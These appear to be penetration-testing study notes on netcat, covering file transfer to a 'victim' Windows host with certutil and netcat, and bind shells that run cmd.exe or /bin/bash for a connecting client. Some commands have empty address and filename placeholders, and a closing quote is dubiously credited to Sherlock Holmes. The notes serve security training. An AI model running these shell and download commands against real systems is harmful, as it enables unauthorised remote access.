# Bind & Reverse Shells ## Netcat Fundamentals * Netcat (Aka TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP. * Netcat is available for both \*NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements. * Netcat utilizes a client-server communication architecture with two modes: * Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server). * Server mode - Netcat can be used to listen for connections from clients on a specific port. * Netcat can be used by penetration testers to perform the following functionality: * Banner Grabbing * Port Scanning * Transferring Files * Bind/Reverse Shells \ ## **Usage of Netcat** The `/usr/share/windows-binaries` folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation. ### Transferring Files from Kali Linux to Windows #### **Using Python HTTP Server and Certutil** 1. **Prepare Files:** * Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux. 2. **Host File on Python Server:** * Start a Python HTTP server: ```bash python3 -m http.server ``` * Files can now be accessed via `http://:8000/`. 3. **Download on Windows Using Certutil:** * On the victim's Windows machine: ```bash certutil -urlcache -f http://:8000/ ``` #### **Using Netcat (nc) for Direct Transfer** 1. **Setup Netcat on Windows:** * Receive files using Netcat: ```bash nc.exe -nvlp 1234 > ``` 2. **Send File from Kali Linux:** * Send file from Kali Linux to Windows: ```bash nc -nv 1234 < ``` * Replace `` with the Windows machine's IP address. ## Bind Shells * A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system. * A Netcat listener can be setup to execute a specific executable like cmd.exe or /bin/bash when a client connects to the listener.

## Setting Up Bind Shells ### **Windows System** * **Establish Bind Shell:** ```bash nc.exe -nvlp 1234 -e cmd.exe ``` This command starts a Netcat listener (`-l`) on port 1234 (`-p 1234`) and executes (`-e`) `cmd.exe` upon connection, creating a bind shell. * **Connect from Linux:** ```bash nc -nv ``` Replace `` with the IP address of the Windows machine hosting the bind shell, and `` with the port number (1234 in this example). ### **Linux System** * **Establish Bind Shell:** ```bash nc -nvlp 1234 -c /bin/bash ``` This command sets up a Netcat listener (`-l`) on port 1234 (`-p 1234`) and executes (`-c`) `/bin/bash` upon connection, creating a bind shell. * **Connect from Windows:** ```bash nc.exe -nv ``` Replace `` with the IP address of the Linux machine hosting the bind shell, and `` with the port number (1234 in this example). ## Reverse Shells * A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

### Reverse Shell Cheatsheet * [Reverse Shell Generator](https://www.revshells.com/) * [Reverse Shell Cheatsheet - PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) *** *** *** **`Hacker's Mantra:`**` ``Humiliation is the favorite currency of the hacker. - Sherlock Holmes`